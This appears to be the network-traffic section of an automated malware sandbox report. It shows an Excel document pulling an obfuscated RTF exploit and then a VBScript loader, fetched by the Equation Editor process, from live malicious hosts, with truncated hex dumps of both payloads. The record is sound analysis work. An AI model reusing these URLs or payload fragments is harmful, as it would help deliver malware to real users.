                                                        Sep 27, 2024 10:27:44.468185902 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:44.468321085 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:44.469122887 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:28:18.215395927 CEST4917180192.168.2.22185.235.137.223

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 27, 2024 10:27:13.844804049 CEST5456253192.168.2.228.8.8.8
                                                        Sep 27, 2024 10:27:13.859518051 CEST53545628.8.8.8192.168.2.22
                                                        Sep 27, 2024 10:27:19.913589001 CEST5291753192.168.2.228.8.8.8
                                                        Sep 27, 2024 10:27:19.927918911 CEST53529178.8.8.8192.168.2.22
                                                        Sep 27, 2024 10:27:23.380498886 CEST6275153192.168.2.228.8.8.8
                                                        Sep 27, 2024 10:27:23.387986898 CEST53627518.8.8.8192.168.2.22
                                                        Sep 27, 2024 10:27:23.390081882 CEST5789353192.168.2.228.8.8.8
                                                        Sep 27, 2024 10:27:23.402549982 CEST53578938.8.8.8192.168.2.22
                                                        Sep 27, 2024 10:27:27.821894884 CEST5482153192.168.2.228.8.8.8
                                                        Sep 27, 2024 10:27:27.829379082 CEST53548218.8.8.8192.168.2.22
                                                        Sep 27, 2024 10:27:27.831527948 CEST5471953192.168.2.228.8.8.8
                                                        Sep 27, 2024 10:27:27.839637041 CEST53547198.8.8.8192.168.2.22
                                                        Sep 27, 2024 10:27:29.149490118 CEST4988153192.168.2.228.8.8.8
                                                        Sep 27, 2024 10:27:29.156718016 CEST53498818.8.8.8192.168.2.22
                                                        Sep 27, 2024 10:27:29.157960892 CEST5499853192.168.2.228.8.8.8
                                                        Sep 27, 2024 10:27:29.164592028 CEST53549988.8.8.8192.168.2.22
                                                        Sep 27, 2024 10:27:40.323401928 CEST5278153192.168.2.228.8.8.8
                                                        Sep 27, 2024 10:27:40.520168066 CEST53527818.8.8.8192.168.2.22

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Sep 27, 2024 10:27:13.844804049 CEST192.168.2.228.8.8.80xaec7Standard query (0)strmr.coA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:19.913589001 CEST192.168.2.228.8.8.80x2c63Standard query (0)strmr.coA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:23.380498886 CEST192.168.2.228.8.8.80x9d7dStandard query (0)strmr.coA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:23.390081882 CEST192.168.2.228.8.8.80x8d70Standard query (0)strmr.coA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:27.821894884 CEST192.168.2.228.8.8.80x1100Standard query (0)strmr.coA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:27.831527948 CEST192.168.2.228.8.8.80x2664Standard query (0)strmr.coA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:29.149490118 CEST192.168.2.228.8.8.80xb6ecStandard query (0)strmr.coA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:29.157960892 CEST192.168.2.228.8.8.80xd97eStandard query (0)strmr.coA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:40.323401928 CEST192.168.2.228.8.8.80x6f98Standard query (0)dl.zerotheme.irA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Sep 27, 2024 10:27:13.859518051 CEST8.8.8.8192.168.2.220xaec7No error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:13.859518051 CEST8.8.8.8192.168.2.220xaec7No error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:19.927918911 CEST8.8.8.8192.168.2.220x2c63No error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:19.927918911 CEST8.8.8.8192.168.2.220x2c63No error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:23.387986898 CEST8.8.8.8192.168.2.220x9d7dNo error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:23.387986898 CEST8.8.8.8192.168.2.220x9d7dNo error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:23.402549982 CEST8.8.8.8192.168.2.220x8d70No error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:23.402549982 CEST8.8.8.8192.168.2.220x8d70No error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:27.829379082 CEST8.8.8.8192.168.2.220x1100No error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:27.829379082 CEST8.8.8.8192.168.2.220x1100No error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:27.839637041 CEST8.8.8.8192.168.2.220x2664No error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:27.839637041 CEST8.8.8.8192.168.2.220x2664No error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:29.156718016 CEST8.8.8.8192.168.2.220xb6ecNo error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:29.156718016 CEST8.8.8.8192.168.2.220xb6ecNo error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:29.164592028 CEST8.8.8.8192.168.2.220xd97eNo error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:29.164592028 CEST8.8.8.8192.168.2.220xd97eNo error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:27:40.520168066 CEST8.8.8.8192.168.2.220x6f98No error (0)dl.zerotheme.ir185.18.213.20A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • strmr.co
                                                        • dl.zerotheme.ir
                                                        • 185.235.137.223

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.2249164185.235.137.223803188C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        TimestampBytes transferredDirectionData
                                                        Sep 27, 2024 10:27:15.004591942 CEST473OUTGET /90/ni/veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof.doc HTTP/1.1
                                                        Accept: */*
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: 185.235.137.223
                                                        Connection: Keep-Alive
                                                        Sep 27, 2024 10:27:15.639127970 CEST1236INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:27:15 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                        Last-Modified: Thu, 26 Sep 2024 06:08:54 GMT
                                                        ETag: "1a9a6-622ff92c15a90"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 108966
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/msword
                                                        Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 39 74 4b 33 75 67 36 53 66 69 4a 42 6c 6f 33 39 56 74 33 57 53 36 61 72 32 76 63 52 4f 70 4e 31 4d 79 77 63 79 44 47 68 71 51 4c 61 39 78 67 31 63 50 31 42 74 66 46 67 35 42 63 35 65 53 43 53 50 6d 62 49 76 4c 75 68 32 4f 74 66 69 70 50 71 39 75 45 4c 32 4c 72 75 44 54 70 4a 51 6f 34 79 53 72 69 73 51 34 79 69 4e 37 4d 44 37 52 39 73 46 78 7d 0d 0d 7b 5c 34 34 36 32 30 36 38 38 25 3d 2d 29 7e 36 31 b5 2f 24 3f 24 39 3b 29 3f 32 b5 3d 26 5f 2d 26 7e 3f 40 2c 2b 2c 5e 29 27 b5 7e 34 26 7c 3f 23 36 3f 3f 7e 31 3b 21 3d b0 2b 60 40 27 31 3e 21 3f 37 29 3f 5b 35 a7 3f 25 7c 25 b5 2c 32 38 5f 5e b5 2a a7 34 2e 5f 3f 5f 31 2b 30 26 25 31 25 29 b5 24 a7 7e 5b 5b 3e 26 60 3f 3f 38 30 27 2e 2a 21 b0 28 2d a7 7c 3f 7e b5 3f 3e 60 3f 30 3a 60 38 24 29 7e 2d 3b b0 23 3f 2b 2e 7e 40 3b 39 33 2d 60 2d 2d 3f 3e 60 b5 23 3f 35 29 38 30 32 3f 37 5d 3d 39 2a 3b 32 2a 3c 5e 2e 2b 35 3a 24 39 37 31 5f 3a 25 37 2e 3f 3d b0 36 b5 2b 3d 3b 3f 3b 34 b5 7e 25 2c 2e 3f 38 3f 36 3f 2d 3f 40 [TRUNCATED]
                                                        Data Ascii: {\rtf1{\*\9tK3ug6SfiJBlo39Vt3WS6ar2vcROpN1MywcyDGhqQLa9xg1cP1BtfFg5Bc5eSCSPmbIvLuh2OtfipPq9uEL2LruDTpJQo4ySrisQ4yiN7MD7R9sFx}{\44620688%=-)~61/$?$9;)?2=&_-&~?@,+,^)'~4&|?#6??~1;!=+`@'1>!?7)?[5?%|%,28_^*4._?_1+0&%1%)$~[[>&`??80'.*!(-|?~?>`?0:`8$)~-;#?+.~@;93-`--?>`#?5)802?7]=9*;2*<^.+5:$971_:%7.?=6+=;?;4~%,.?8?6?-?@#8_2/6<8#.'[<?$:.)47356-,&|?>'(5#?|;[*@$31/)*3%@%*336$5+'?'^4(,.,0@9;.%^^.+#.+?#;,>;-#,112.?]].`*:'<0&%:~7^%??95')5#4?%&`,9,,.?02~/=]&-0([-|+~[|&31_79|%13%/.:?*^7]4??.?/_6;!?!~7;=5%0;754?36>5!;=0.?9<;>^?.5&/8?;-36:_@^0?;*0`|=;?824?7%+%)2>:)2=_*_/>?9_.<%),*^35''?|?$?!~|9!)?;?5]0&!4^?^/;~~`@#8~)16>)?)+#5['%#(/~-&?1=,#~6^?%,+-?%@=[)*230`;!|%(<?6??_(4,,7@:??~!5!?639@6+!3>%3???]%]%1@68526&5%:[@/)~];^+;<#).~`?81^*9>|&90&60!!(&??</_/`=<|+%44~.?%??5(]_~/?(-9?1+0@3%?'>|?1!!:*,_!%9$]%=51?7)-^%$6$$<;*3:8&|:<3%`<%?@]:4@)?*>?.-?6[|)6=4=)
                                                        Sep 27, 2024 10:27:15.639174938 CEST224INData Raw: 29 38 25 2a 7e 3f 2a 3f 31 33 3a 60 37 3f 3d 5f 24 37 2d 7c 3b 7c 5f 25 7c 34 2c 2a 5e 2b 3d 37 7c 30 3f 38 5d 30 21 29 36 3e 3c 28 2f 3b a7 3e 25 2e 24 7c 24 7c 3f 3f 33 24 60 32 3b 32 26 5f 24 3e 2b 60 21 29 3f 31 60 3c 2c 5d 2b 3b 34 3d 39 2b
                                                        Data Ascii: )8%*~?*?13:`7?=_$7-|;|_%|4,*^+=7|0?8]0!)6><(/;>%.$|$|??3$`2;2&_$>+`!)?1`<,]+;4=9+;;^[-421?`];&;8~!818?<'!?9'>3?(!=*.]!4<=.??6.?5%5/4:7>($^^+?-[!)_%;/7]`?!8+?=`??1?[0?89^3_&??[+?8&>/?]8*^?[%==8$;>?/65,?|<^???(0`0%'7?2
                                                        Sep 27, 2024 10:27:15.639204979 CEST1236INData Raw: 3d 36 27 7c 5e 23 34 b0 25 3a 25 5e 7c 3e 3a 2f 31 24 3a 3f 2c 30 2d 3a 60 2a 2d 25 27 2f 5f 3d 25 39 3f 37 2d 32 24 28 25 21 3f 2f 36 7c 36 60 24 26 2a 38 3f 2d 3f 3a 26 3c 2e 3c 32 2e b5 24 5f b5 36 40 38 36 2e 34 3c 29 23 29 31 3c 25 2d 7e 2f
                                                        Data Ascii: =6'|^#4%:%^|>:/1$:?,0-:`*-%'/_=%9?7-2$(%!?/6|6`$&*8?-?:&<.<2.$_6@86.4<)#)1<%-~/^#~?6!>85^2&-4?+@*(4&`/$_<%?'=`?%?68)@+7&@46)0-@70*@_3%6%)>3%~-7:?6#<$?0&!$3|!~8?|-?[3),8?&%61|%8[&21[??$_'#>;6*5~2'019>']837@`[/9@1;91|+?,??,22;%?&8)?,
                                                        Sep 27, 2024 10:27:15.639235973 CEST1236INData Raw: 3f 5f 3f 3f 2c 2d 3b 5f 38 3f 25 3e 3c 34 3a 3c 24 7e 2e 39 23 31 2d 2c 39 37 3f 2b 35 3d 5f 3f 37 35 a7 a7 2c 3f 28 34 3f 26 7c 3f 39 24 3c 29 7e 3f 30 3f 32 24 24 30 39 3f 3f 35 39 3b 5d b5 2f 25 2b 28 25 5e 3f 5b 24 31 24 2b 23 5e 3b 3a 21 33
                                                        Data Ascii: ?_??,-;_8?%><4:<$~.9#1-,97?+5=_?75,?(4?&|?9$<)~?0?2$$09??59;]/%+(%^?[$1$+#^;:!3#3??90),??`+)*<?_,??!?&,?~??^?(~:]?9-2_@3+^%1,>_(,;+(%&|%|2?<48%3?57_#`679-'=>14`1+&>&7|/#^<~,6?.$?!_@:>_[~!=`.9;?)/_5#?:2?0!1~&^167/<'7_*0?>?)%)?<86
                                                        Sep 27, 2024 10:27:15.639323950 CEST1236INData Raw: 33 21 34 28 3f 30 3f 2e b5 3c 40 7e 40 21 5d 7c 24 36 21 3f 37 3f 3e 3f 40 31 28 3f 2f 23 24 3f 2b 3f 37 21 5d 3f 25 25 32 30 2f 3f b0 31 3b 3c 2b 2b 5f 28 3f 37 27 2c 25 5b 3d b5 23 33 3c 29 29 5b b0 b5 2f 3b 25 3a 3e b5 33 25 3e 34 27 25 2c 25
                                                        Data Ascii: 3!4(?0?.<@~@!]|$6!?7?>?@1(?/#$?+?7!]?%%20/?1;<++_(?7',%[=#3<))[/;%:>3%>4'%,%:5?!/>-+=#/^;3;`|]?(%42?2|;95`3^:<8]%?>]?0?`:6?0)9]`--;%_?%[+__~()(@@]$=_?!4)65[;<#>6;4^+@?&7:+?4%`_'-?8&$%4,$&*[6[?%>0$3?$?0?-355?5:[$*4=8,1<0:>7/].?6?2^2
                                                        Sep 27, 2024 10:27:15.639373064 CEST1236INData Raw: 3f 21 3e 27 2a 3d 35 7c 33 2b 3c 32 60 5b 30 3a 28 3b 7c 30 60 28 7e 33 27 28 30 7e 3b 30 3a 3f 3f b0 5f 35 2c 25 3d 29 3c 5b 39 b5 b0 33 3b a7 37 2a 40 35 3f 40 2a 40 3e b5 3f 5b 35 3e 40 29 5b b5 b5 3f 29 33 5e 5f 28 a7 3e 39 2d 5b 23 5f 3e 24
                                                        Data Ascii: ?!>'*=5|3+<2`[0:(;|0`(~3'(0~;0:??_5,%=)<[93;7*@5?@*@>?[5>@)[?)3^_(>9-[#_>$(^]2)%_`0[;(--?#2(@,8*3.91?*/,|#?$1&9>`~4`>=?4?[)63?%`???@<<^6`:?$9?1^`&??*_?4$4%%)__=~!/8/?%?3!%-,-+;!@?1?1?&7)4~^>=,?49^1~+03!|]9?-2/_?;%</]?^5%*@=:)/?
                                                        Sep 27, 2024 10:27:15.639421940 CEST896INData Raw: 2f 2f 2e 2c 3f 2a 40 3f a7 30 3c 2e 2d 31 7e 34 30 3f 39 5f 7e 36 a7 2a 3e 26 27 25 60 2e 24 5b 26 3b 2f 31 2b 7e 2d 2d 37 3b 2f 2b 2f 60 a7 3a 37 30 5d 60 3d 32 3f 3f 2f 3f 5b 3e 3f 27 25 2d 2b 25 3f 3f 3f b5 37 3f 23 38 3a 2a 23 2c 32 36 60 2d
                                                        Data Ascii: //.,?*@?0<.-1~40?9_~6*>&'%`.$[&;/1+~--7;/+/`:70]`=2??/?[>?'%-+%???7?#8:*#,26`-8|'+?9<*)?5`~_??0?*]?^'9??^])`%1;)=:(2=&,=?|?~/>04._>$.5???(_>|^-!&,!'-;83@3$95;,&.3[:($4,>^73+55=1[5:%?%<]*~@)<#?1(9(743:^?2<*`2^|&4^!)$*`~%-88$`$*'.)!
                                                        Sep 27, 2024 10:27:15.639456034 CEST1236INData Raw: 27 3c 27 29 26 34 3f 3c 2f 33 3e 5d 5d 3f 35 2a 39 a7 3f 3f 2e 3b 7c 26 a7 36 3f a7 27 31 b0 26 35 30 3f 36 33 23 b0 7c 25 28 2a 25 a7 36 5b 23 32 26 5f 24 3d 60 21 a7 3f 3d 3f 29 23 24 33 a7 33 2c 7e 3f 27 b5 26 5d 3f 37 34 b5 34 25 35 26 2b 3f
                                                        Data Ascii: '<')&4?</3>]]?5*9??.;|&6?'1&50?63#|%(*%6[#2&_$=`!?=?)#$33,~?'&]?744%5&+?3?#*??|;48]`;_779]7(@(84@(#76-25%1=5,#&:?;?#~4.;|*&3%2~%.^,..#?=*;&@+-[]^:$'>[(??3,122@~%!/~_;;4[=!8]:__?;?1#,?#(%~?(?<7~[%]2:.,+6]:%:27%:3*/`
                                                        Sep 27, 2024 10:27:15.639488935 CEST1236INData Raw: 41 34 42 72 56 56 6e 58 43 51 46 6d 77 37 6b 6c 69 71 5a 5a 72 32 57 53 38 61 76 4d 4a 61 5a 67 6d 41 38 48 57 67 65 69 4b 32 55 72 48 4d 48 57 4f 74 4b 63 61 39 44 48 77 48 57 56 34 69 30 72 72 35 74 53 53 4a 53 4b 50 31 71 71 41 44 39 55 6b 37
                                                        Data Ascii: A4BrVVnXCQFmw7kliqZZr2WS8avMJaZgmA8HWgeiK2UrHMHWOtKca9DHwHWV4i0rr5tSSJSKP1qqAD9Uk7lxiLvJPFYaJdMUpa9SFeMurAykUzXABKVb9tn4wGgbwbo66SXHmyVy4FXdAya67JCcl505w7abttVE4Tiyyb44S3AW6QSoypX0VBitoZtc3obP8RMZjmCjQNYQCcJq7f8nGV31zQGgKdFBi664xn2SOyKONrJizbg
                                                        Sep 27, 2024 10:27:15.639523029 CEST1236INData Raw: 20 32 20 20 09 09 20 20 20 20 20 09 20 09 20 20 09 20 09 09 09 09 20 20 20 20 09 20 09 20 09 09 20 09 09 20 20 20 20 20 09 09 20 09 09 09 20 09 20 20 09 09 09 20 20 20 09 20 09 09 20 20 20 20 09 20 20 20 09 09 20 20 20 20 30 20 20 09 20 20 09 09
                                                        Data Ascii: 2 0 000000b
                                                        Sep 27, 2024 10:27:15.644385099 CEST1236INData Raw: 20 20 33 33 30 0d 0d 0d 0a 0a 0d 0a 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0d 0d 0a 0a 0a 0d 0a 0d 0a 30 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0d 0d 0a 0a 0a 0d 0a 0d 0a 30 20 20 09 20 09 20 20 20 09 20 20 09 20 09 09 20 20 20 20
                                                        Data Ascii: 33000 000


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.2249171185.235.137.223803496C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        TimestampBytes transferredDirectionData
                                                        Sep 27, 2024 10:27:32.483186007 CEST286OUTHEAD /90/ni/veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof.doc HTTP/1.1
                                                        User-Agent: Microsoft Office Existence Discovery
                                                        Host: 185.235.137.223
                                                        Content-Length: 0
                                                        Connection: Keep-Alive
                                                        Sep 27, 2024 10:27:33.100713015 CEST323INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:27:33 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                        Last-Modified: Thu, 26 Sep 2024 06:08:54 GMT
                                                        ETag: "1a9a6-622ff92c15a90"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 108966
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/msword


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.2249172185.235.137.223803860C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        TimestampBytes transferredDirectionData
                                                        Sep 27, 2024 10:27:35.068087101 CEST333OUTGET /90/seethedifferentofpicture.vbs HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: 185.235.137.223
                                                        Connection: Keep-Alive
                                                        Sep 27, 2024 10:27:35.691303015 CEST1236INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:27:35 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                        Last-Modified: Thu, 26 Sep 2024 05:31:01 GMT
                                                        ETag: "1690f-622ff0b443a84"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 92431
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-vbscript
                                                        Data Raw: 27 20 4d 61 69 6e 20 73 63 72 69 70 74 20 6c 6f 67 69 63 20 66 6f 72 20 70 72 6f 63 65 73 73 69 6e 67 20 42 61 73 65 36 34 2d 65 6e 63 6f 64 65 64 20 64 61 74 61 0d 0a 0d 0a 27 20 49 6e 69 74 69 61 6c 69 7a 65 20 74 68 65 20 42 61 73 65 36 34 20 65 6e 63 6f 64 65 64 20 73 74 72 69 6e 67 20 28 70 6c 61 63 65 68 6f 6c 64 65 72 29 0d 0a 44 69 6d 20 65 6e 63 6f 64 65 64 42 61 73 65 36 34 53 74 72 69 6e 67 0d 0a 65 6e 63 6f 64 65 64 42 61 73 65 36 34 53 74 72 69 6e 67 20 3d 20 22 29 29 3b 3b 3b 71 51 40 40 40 40 4d 40 40 40 40 40 40 40 40 45 40 40 40 40 40 40 40 40 2f 2f 38 40 40 40 40 4c 67 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 51 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 67 40 40 40 40 40 40 40 40 40 40 34 66 75 67 34 40 40 74 40 40 6e 4e 49 62 67 2e [TRUNCATED]
                                                        Data Ascii: ' Main script logic for processing Base64-encoded data' Initialize the Base64 encoded string (placeholder)Dim encodedBase64StringencodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@))@@ED@@Fvx9GY@@@@@@@@@@@@@@@@@@@@O@@@@DgEL@@))@@@@@@I@@@@@@@@C8@@@@@@@@@@@@@@@@Ep4@@@@@@@@g@@@@@@@@o@@@@@@@@@@...@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@...@@@@@@...@@@@@@@@@@@@E@@@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Lid@@@@...X@@@@@@@@@@M@@@@@@@@Q7@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@K@@@@@@@@w@@@@@@CwSQ@@@@H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                                                        Sep 27, 2024 10:27:35.691323042 CEST224INData Raw: 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 49 40 40 40 40 40 40 43 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40
                                                        Data Ascii: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@CC@@@@@@Eg@@@@@@@@@@@@@@@@@@@@@@@@@@@@C50ZXh0@@@@@@@@GH4@@@@@@@@g@@@@@@@@g@@@@@@@@@@I@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@C@@@@@
                                                        Sep 27, 2024 10:27:35.691334963 CEST1236INData Raw: 40 47 40 40 75 63 6d 3b 3b 3b 73 62 32 4d 40 40 40 40 40 40 77 40 40 40 40 40 40 40 40 40 40 6f 40 40 40 40 40 40 40 40 40 40 49 40 40 40 40 40 40 43 43 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40
                                                        Data Ascii: @G@@ucm;;;sb2M@@@@@@w@@@@@@@@@@o@@@@@@@@@@I@@@@@@CC@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...@@@@@@...CLn&&&zcmM@@@@@@@@EOw@@@@@@M@@@@@@@@@@8@@@@@@@@h@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@D0nQ@@@@
                                                        Sep 27, 2024 10:27:35.691342115 CEST1236INData Raw: 40 45 4b 67 40 40 44 4d 40 40 6b 40 40 2e 2e 2e 77 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 43 4b 43 51 40 40 40 40 40 40 6f 71 40 40 40 40 4d 77 43 51 40 40 2e 2e 2e 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 43 6f 40 40
                                                        Data Ascii: @EKg@@DM@@k@@...w@@@@@@@@@@@@@@@@@@CKCQ@@@@@@oq@@@@MwCQ@@...@@@@@@@@@@@@@@@@@@Co@@@@@@@@))M@@M@@Uw@@@@@@@@U@@@@...EoX@@@@@@...iUmCgYoDg@@@@...iUmCwMomg@@@@...iUm...yhY@@@@@@GLD@@dRQE@@@@@@D2////Fy0G0@@0@@@@@@Ym...gcozw@@@@...iUmD...9haggoK@@@@
                                                        Sep 27, 2024 10:27:35.691346884 CEST448INData Raw: 2e 45 40 40 40 40 43 67 37 40 40 40 40 40 40 47 26 26 26 53 59 4b 40 40 40 40 59 43 4b 49 55 40 40 40 40 40 40 59 6c 26 26 26 67 73 67 45 51 49 40 40 40 40 43 67 69 40 40 40 40 40 40 47 26 26 26 53 59 43 4b 43 73 2e 2e 2e 40 40 40 40 59 6f 46 77
                                                        Data Ascii: .E@@@@Cg7@@@@@@G&&&SYK@@@@YCKIU@@@@@@Yl&&&gsgEQI@@@@Cgi@@@@@@G&&&SYCKCs...@@@@YoFw@@@@...g@@HDN5r...iwaGEU...@@@@@@@@9v///xct...t@@))@@@@@@G&&&gYoww@@@@...gDcDQ@@gQgI@@@@Cgi@@@@@@G&&&SYCCSi2@@@@@@G&&&SYoug@@@@...iUmK...g@@@@@@Y@@/ho))...@@@@gj
                                                        Sep 27, 2024 10:27:35.691359043 CEST1236INData Raw: 40 40 40 40 40 47 26 26 26 53 59 4b 2e 2e 2e 67 4d 6f 46 67 40 40 40 40 2e 2e 2e 67 40 40 67 36 67 49 40 40 40 40 43 67 69 40 40 40 40 40 40 47 26 26 26 53 59 6f 46 77 40 40 40 40 2e 2e 2e 67 40 40 40 40 33 69 59 4c 40 40 43 40 40 78 40 40 77 40
                                                        Data Ascii: @@@@@G&&&SYK...gMoFg@@@@...g@@g6gI@@@@Cgi@@@@@@G&&&SYoFw@@@@...g@@@@3iYL@@C@@x@@w@@@@KCI@@@@@@Yl&&&gcotg@@@@...iUmKH@@@@@@@@Yl&&&igY@@@@@@G@@@@De@@Co@@@@R@@@@@@@@@@@@@@Q@@nK@@@@mFQ@@@@@@Rsw...@@...I@@@@@@@@D@@@@@@EQ@@@@@@iir@@@@@@G&&&SYKIHID@@
                                                        Sep 27, 2024 10:27:35.691370964 CEST1236INData Raw: 40 40 6b 40 40 2e 2e 2e 77 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 43 4b 43 51 40 40 40 40 40 40 6f 71 40 40 40 40 4d 77 43 51 40 40 4f 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 48 34 46 40 40 40 40 40 40 45 40 40 69 68
